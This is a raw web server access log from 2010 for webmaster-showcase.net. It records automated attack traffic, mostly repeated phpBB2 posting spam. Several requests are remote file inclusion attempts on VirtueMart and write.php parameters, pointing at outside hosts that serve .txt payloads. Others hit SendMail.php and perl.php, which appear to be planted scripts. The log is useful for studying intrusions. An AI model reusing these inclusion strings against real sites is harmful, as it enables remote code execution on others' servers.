125.160.17.201 - - [11/Mar/2010:16:54:51 -0800] "GET /logs/showfile.php//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.ingenieriacomercial.com/list/respon1.txt? HTTP/1.1" 200 1595 "-" "Mozilla/5.0" "webmaster-showcase.net"
64.120.227.34 - - [11/Mar/2010:16:54:51 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
87.106.132.3 - - [11/Mar/2010:16:54:55 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.ingenieriacomercial.com/list/id1.txt?? HTTP/1.1" 404 607 "-" "Mozilla/5.0" "webmaster-showcase.net"
87.106.132.3 - - [11/Mar/2010:16:54:55 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.ingenieriacomercial.com/list/id1.txt?? HTTP/1.1" 404 613 "-" "Mozilla/5.0" "webmaster-showcase.net"
87.106.132.3 - - [11/Mar/2010:16:54:55 -0800] "GET /logs/showfile.php//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.ingenieriacomercial.com/list/id1.txt?? HTTP/1.1" 200 1595 "-" "Mozilla/5.0" "webmaster-showcase.net"
87.106.132.3 - - [11/Mar/2010:16:54:55 -0800] "GET /logs/showfile.php/access_100212.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.ingenieriacomercial.com/list/id1.txt?? HTTP/1.1" 200 1595 "-" "Mozilla/5.0" "webmaster-showcase.net"
94.102.63.11 - - [11/Mar/2010:16:55:02 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
87.106.132.3 - - [11/Mar/2010:16:55:09 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.ingenieriacomercial.com/list/id1.txt?? HTTP/1.1" 404 617 "-" "Mozilla/5.0" "www.webmaster-showcase.net"
87.106.132.3 - - [11/Mar/2010:16:55:09 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.ingenieriacomercial.com/list/id1.txt?? HTTP/1.1" 404 611 "-" "Mozilla/5.0" "www.webmaster-showcase.net"
87.106.132.3 - - [11/Mar/2010:16:55:09 -0800] "GET /logs/showfile.php//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.ingenieriacomercial.com/list/id1.txt?? HTTP/1.1" 200 1595 "-" "Mozilla/5.0" "www.webmaster-showcase.net"
87.106.132.3 - - [11/Mar/2010:16:55:09 -0800] "GET /logs/showfile.php/access.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.ingenieriacomercial.com/list/id1.txt?? HTTP/1.1" 200 1595 "-" "Mozilla/5.0" "www.webmaster-showcase.net"
64.120.232.58 - - [11/Mar/2010:16:55:18 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
64.120.227.34 - - [11/Mar/2010:16:55:31 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
94.102.63.11 - - [11/Mar/2010:16:55:40 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
64.120.232.58 - - [11/Mar/2010:16:55:45 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
62.149.226.208 - - [11/Mar/2010:16:56:03 -0800] "GET / HTTP/1.0" 200 686 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.webmaster-showcase.net"
64.120.227.34 - - [11/Mar/2010:16:56:08 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
64.120.232.58 - - [11/Mar/2010:16:56:17 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
94.102.63.11 - - [11/Mar/2010:16:56:17 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
64.120.232.58 - - [11/Mar/2010:16:56:42 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
64.120.227.34 - - [11/Mar/2010:16:56:49 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
94.102.63.11 - - [11/Mar/2010:16:57:02 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
64.120.232.58 - - [11/Mar/2010:16:57:14 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
125.160.17.201 - - [11/Mar/2010:16:57:15 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.ingenieriacomercial.com/list/respon1.txt? HTTP/1.1" 404 607 "-" "Mozilla/5.0" "webmaster-showcase.net"
125.160.17.201 - - [11/Mar/2010:16:57:15 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.ingenieriacomercial.com/list/respon1.txt? HTTP/1.1" 404 613 "-" "Mozilla/5.0" "webmaster-showcase.net"
125.160.17.201 - - [11/Mar/2010:16:57:17 -0800] "GET /logs/showfile.php//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.ingenieriacomercial.com/list/respon1.txt? HTTP/1.1" 200 1595 "-" "Mozilla/5.0" "webmaster-showcase.net"
125.160.17.201 - - [11/Mar/2010:16:57:17 -0800] "GET /logs/showfile.php/access_100217.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.ingenieriacomercial.com/list/respon1.txt? HTTP/1.1" 200 1595 "-" "Mozilla/5.0" "webmaster-showcase.net"
64.120.227.34 - - [11/Mar/2010:16:57:31 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
94.102.63.11 - - [11/Mar/2010:16:57:42 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
64.120.232.58 - - [11/Mar/2010:16:57:48 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
69.132.209.12 - - [11/Mar/2010:16:58:03 -0800] "GET /yahoo/SendMail.php HTTP/1.1" 200 4921 "http://us.1.p2.webhosting.yahoo.com/phpmailsetup" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10" "www.webmaster-showcase.net"
69.132.209.12 - - [11/Mar/2010:16:58:04 -0800] "GET /yahoo/images/c.gif HTTP/1.1" 404 579 "http://www.webmaster-showcase.net/yahoo/SendMail.php" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10" "www.webmaster-showcase.net"
69.132.209.12 - - [11/Mar/2010:16:58:04 -0800] "GET /favicon.ico HTTP/1.1" 404 572 "http://www.webmaster-showcase.net/yahoo/SendMail.php" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10" "www.webmaster-showcase.net"
64.120.227.34 - - [11/Mar/2010:16:58:10 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
64.120.232.58 - - [11/Mar/2010:16:58:16 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
94.102.63.11 - - [11/Mar/2010:16:58:22 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
64.120.232.58 - - [11/Mar/2010:16:58:43 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
64.120.227.34 - - [11/Mar/2010:16:58:55 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
94.102.63.11 - - [11/Mar/2010:16:59:08 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
64.120.232.58 - - [11/Mar/2010:16:59:13 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
64.120.227.34 - - [11/Mar/2010:16:59:34 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
64.120.232.58 - - [11/Mar/2010:16:59:46 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
94.102.63.11 - - [11/Mar/2010:16:59:52 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
64.90.164.110 - - [11/Mar/2010:17:00:02 -0800] "GET / HTTP/1.0" 200 686 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.webmaster-showcase.net"
209.235.254.107 - - [11/Mar/2010:17:00:10 -0800] "GET / HTTP/1.0" 200 686 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.webmaster-showcase.net"
64.120.232.58 - - [11/Mar/2010:17:00:13 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
64.120.227.34 - - [11/Mar/2010:17:00:24 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
94.102.63.11 - - [11/Mar/2010:17:00:38 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
67.195.111.151 - - [11/Mar/2010:17:00:56 -0800] "GET /yahoo/perl.php?d=/usr/lib/perl5/5.8.7/Memoize HTTP/1.0" 200 3171 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.webmaster-showcase.net"
64.120.232.58 - - [11/Mar/2010:17:01:02 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
64.120.227.34 - - [11/Mar/2010:17:01:06 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
94.102.63.11 - - [11/Mar/2010:17:01:19 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
64.120.232.58 - - [11/Mar/2010:17:01:19 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
64.120.227.34 - - [11/Mar/2010:17:01:41 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
64.120.232.58 - - [11/Mar/2010:17:01:53 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
94.102.63.11 - - [11/Mar/2010:17:01:59 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
65.39.140.138 - - [11/Mar/2010:17:02:03 -0800] "GET / HTTP/1.0" 200 686 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.webmaster-showcase.net"
64.120.232.58 - - [11/Mar/2010:17:02:19 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
64.120.227.34 - - [11/Mar/2010:17:02:26 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
94.102.63.11 - - [11/Mar/2010:17:02:47 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
64.120.232.58 - - [11/Mar/2010:17:02:49 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
58.61.164.40 - - [11/Mar/2010:17:02:54 -0800] "GET / HTTP/1.1" 200 686 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "webmaster-showcase.net"
64.120.227.34 - - [11/Mar/2010:17:02:59 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
58.61.164.40 - - [11/Mar/2010:17:03:07 -0800] "GET /nav.php HTTP/1.1" 200 4763 "http://webmaster-showcase.net/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "webmaster-showcase.net"
58.61.164.40 - - [11/Mar/2010:17:03:09 -0800] "GET /main.php HTTP/1.1" 200 5312 "http://webmaster-showcase.net/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "webmaster-showcase.net"
64.120.232.58 - - [11/Mar/2010:17:03:30 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
94.102.63.11 - - [11/Mar/2010:17:03:33 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
69.20.70.31 - - [11/Mar/2010:17:03:35 -0800] "GET / HTTP/1.0" 200 686 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.webmaster-showcase.net"
64.120.227.34 - - [11/Mar/2010:17:03:43 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
64.120.232.58 - - [11/Mar/2010:17:03:49 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
65.17.253.220 - - [11/Mar/2010:17:04:04 -0800] "GET / HTTP/1.0" 200 686 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.webmaster-showcase.net"
68.51.119.141 - - [11/Mar/2010:17:04:05 -0800] "GET /yahoo/SendMail.php HTTP/1.1" 200 4921 "http://us.1.p11.webhosting.yahoo.com/phpmailsetup" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-US) AppleWebKit/532.9 (KHTML, like Gecko) Chrome/5.0.307.11 Safari/532.9" "www.webmaster-showcase.net"
68.51.119.141 - - [11/Mar/2010:17:04:05 -0800] "GET /yahoo/images/c.gif HTTP/1.1" 404 579 "http://www.webmaster-showcase.net/yahoo/SendMail.php" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-US) AppleWebKit/532.9 (KHTML, like Gecko) Chrome/5.0.307.11 Safari/532.9" "www.webmaster-showcase.net"
68.51.119.141 - - [11/Mar/2010:17:04:06 -0800] "GET /favicon.ico HTTP/1.1" 404 572 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-US) AppleWebKit/532.9 (KHTML, like Gecko) Chrome/5.0.307.11 Safari/532.9" "www.webmaster-showcase.net"
94.102.63.11 - - [11/Mar/2010:17:04:09 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
64.120.232.58 - - [11/Mar/2010:17:04:19 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
64.120.227.34 - - [11/Mar/2010:17:04:25 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
64.120.232.58 - - [11/Mar/2010:17:04:52 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
94.102.63.11 - - [11/Mar/2010:17:04:56 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
64.120.232.58 - - [11/Mar/2010:17:05:16 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
211.115.81.247 - - [11/Mar/2010:17:05:31 -0800] "GET /include/write.php?dir=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 587 "-" "Mozilla/5.0" "webmaster-showcase.net"
211.115.81.247 - - [11/Mar/2010:17:05:31 -0800] "GET /logs//include/write.php?dir=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 580 "-" "Mozilla/5.0" "webmaster-showcase.net"
94.102.63.11 - - [11/Mar/2010:17:05:35 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
64.120.232.58 - - [11/Mar/2010:17:05:43 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
64.120.227.34 - - [11/Mar/2010:17:05:48 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
211.115.81.247 - - [11/Mar/2010:17:05:51 -0800] "GET /logs/showfile.php/access_100303.log//include/write.php?dir=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 200 1595 "-" "Mozilla/5.0" "webmaster-showcase.net"
211.115.81.247 - - [11/Mar/2010:17:05:51 -0800] "GET /logs/showfile.php//include/write.php?dir=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 200 1595 "-" "Mozilla/5.0" "webmaster-showcase.net"
94.102.63.11 - - [11/Mar/2010:17:06:15 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
64.120.232.58 - - [11/Mar/2010:17:06:18 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
64.120.227.34 - - [11/Mar/2010:17:06:24 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
64.120.232.58 - - [11/Mar/2010:17:06:45 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
94.102.63.11 - - [11/Mar/2010:17:06:47 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
208.109.21.238 - - [11/Mar/2010:17:07:03 -0800] "GET / HTTP/1.0" 200 686 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.webmaster-showcase.net"
64.120.227.34 - - [11/Mar/2010:17:07:06 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
64.120.232.58 - - [11/Mar/2010:17:07:11 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
94.102.63.11 - - [11/Mar/2010:17:07:36 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
64.120.232.58 - - [11/Mar/2010:17:07:43 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
64.120.227.34 - - [11/Mar/2010:17:07:48 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
94.102.63.11 - - [11/Mar/2010:17:08:14 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
64.120.232.58 - - [11/Mar/2010:17:08:16 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
